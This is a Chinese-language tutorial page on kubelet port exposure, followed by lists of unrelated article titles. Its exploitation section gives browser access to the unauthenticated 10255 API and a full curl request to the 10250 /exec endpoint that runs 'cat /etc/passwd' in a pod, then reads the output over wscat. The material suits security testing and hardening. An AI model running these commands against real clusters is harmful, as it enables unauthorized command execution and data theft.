一、简介

kubernetes 是一个分布式的集群管理系统,在每个节点(node)上都要运行一个kubelet对容器进行生命周期的管理。
kubelet开放的端口有:

端口 作用 描述
4194 cAdvisor 监听 kublet 通过该端口可以获取到该节点的环境信息以及 node 上运行的容器状态等内容,访问 http://localhost:4194 可以看到 cAdvisor 的管理界面,通过 kubelet 的启动参数 --cadvisor-port 可以指定启动的端口。
10248 健康检查端口 健康检查通过访问该端口可以判断 kubelet 是否正常工作,通过 kubelet 的启动参数 --healthz-port 和 --healthz-bind-address 来指定监听的地址和端口。
10250 kubelet API kubelet server 与 apiserver 通信的端口,定期请求 apiserver 获取自己所应当处理的任务,通过该端口可以访问获取node资源以及状态。
10255 readonly API 提供了pod和node的信息,接口以只读形式暴露出去,访问该端口不需要认证和鉴权。

二、漏洞利用

kubernetes主要漏洞有端口开放泄露敏感信息,10255端口如果对外开放,攻击者利用公开api可以获取敏感信息。更严重的漏洞是开放10250端口,可能存在远程命令执行漏洞。通过以使用kubernetes的某应用为例说明漏洞的利用方法。
首先确定该应用使用了kubernetes,并开放了4个端口。

1、10255端口泄露敏感信息

该漏洞利用比较简单,直接在浏览器中访问:http://X.X.X.X:10255/logs/ ,或者其他api也行,查看是否存在响应数据,如果存在,则暴露出敏感信息。

2、远程命令执行漏洞

该漏洞的利用相对复杂一点,首先需要访问https://X.X.X.X:10250/pods/,确认10250端口对外开放。如果开放,则进行下一步,需要一台linux主机执行以下指令:
curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://X.X.X.X:10250/exec/namespace/podname/container-name?command=cat&command=/etc/passwd&input=1&output=1&tty=1"
command就是要远程执行的命令,本例是cat /etc/passwd。很明显需要确定三个参数,namespace、podname和container-name,此时又需要在https://X.X.X.X:10250/pods/页面中选择一个pod,如下图:

构造好curl请求之后,得到执行结果,其中location就是所需要的websocket地址。

然后在使用wscat工具连接websocket。如果在windows下安装wscat,需要先安装node和npm。wscat命令为:
wscat -c “https://X.X.X.X:10250/location的值” --no-check
查看响应值,得到/etc/passwd,确定命令执行成功。

kubelet漏洞利用相关推荐

  1. CORS漏洞利用检测和利用方式

    CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...

  2. 流行漏洞利用工具包瞄准Flash、Java和IE

    Digital Shadows研究了"In the Business of Exploitation"中22个漏洞利用工具包,发现共有76个被瞄准的漏洞.最常被利用的软件应该不会太 ...

  3. Flash Player漏洞利用Exploiting Flash Reliably

    以下消息来自幻影论坛[Ph4nt0m]邮件组   前两天推荐过Mark Dowd的Paper "Exploiting Flash Reliably" [url]http://hi. ...

  4. 溢出漏洞利用小结(基础)

    shell 获取小结 这里总结几种常见的获取 shell 的方式: 执行 shellcode,这一方面也会有不同的情况 可以直接返回 shell 可以将 shell 返回到某一个端口 shellcod ...

  5. 7. Vulnerability exploitation tools (漏洞利用工具 11个)

    Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...

  6. ASP.net 资源请求漏洞利用工具PadBuster

    ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...

  7. ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法

    ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...

  8. S2-045漏洞利用工具解决方案

    S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...

  9. WPS漏洞利用工具Bully常见命令集合

    WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.

最新文章

  1. 【rsyslogd】rsyslog 中 timereported 与 timegenerated 区别
  2. @codeforces - 1106F@ Lunar New Year and a Recursive Sequence
  3. JavaWeb学习笔记——Tomcat配置
  4. 1-3-JavaScript技术
  5. [Fondar]手机屏幕驱动板HDMI接口USB触摸使用步骤
  6. iphone用计算机显示器,如何将iPhone屏幕投射到电脑上
  7. 文件过大 不能导入U盘怎么办
  8. python关键词排名批量查排名_Python批量查询百度排名
  9. ipsec ikev2 中转
  10. 不占广告位增加网站收入揭秘
  11. 移动机器人五种坐标系
  12. centos7安装activemq以及无法访问前台页面
  13. php高仿互站网源码,2020新版友价高仿互站网源码 虚拟交易商城整站源码
  14. HAProxy入门(一)
  15. F007-正本清源说奥派 #F1170
  16. 机器学习:BP神经网络,CNN卷积神经网络,GAN生成对抗网络
  17. Linux网络故障排查
  18. uni-app 打包H5项目
  19. 【计算机网络】家用路由器的NAT模式和路由模式
  20. Android框架源码分析——从设计模式角度看 Retrofit 核心源码

热门文章

  1. C语言之return用法
  2. python 设备采集系统_真实世界的Python仪器监控:数据采集与控制系统自动化
  3. np.meshgrid()
  4. IT行业项目解决方案编写策略
  5. cesium 开发记录报错:DeveloperError: Appearance/Geometry mismatch.
  6. 你真正了解低代码么?(国内低代码平台状况分析)
  7. 带你快速入门数控编程
  8. unity Android平台最佳效果探索(二)
  9. 三百英雄服务器维护2020,300英雄将在2020.10.2停机更新
  10. 全国计算机等级一级考试中的基本操作题是如何保存提交?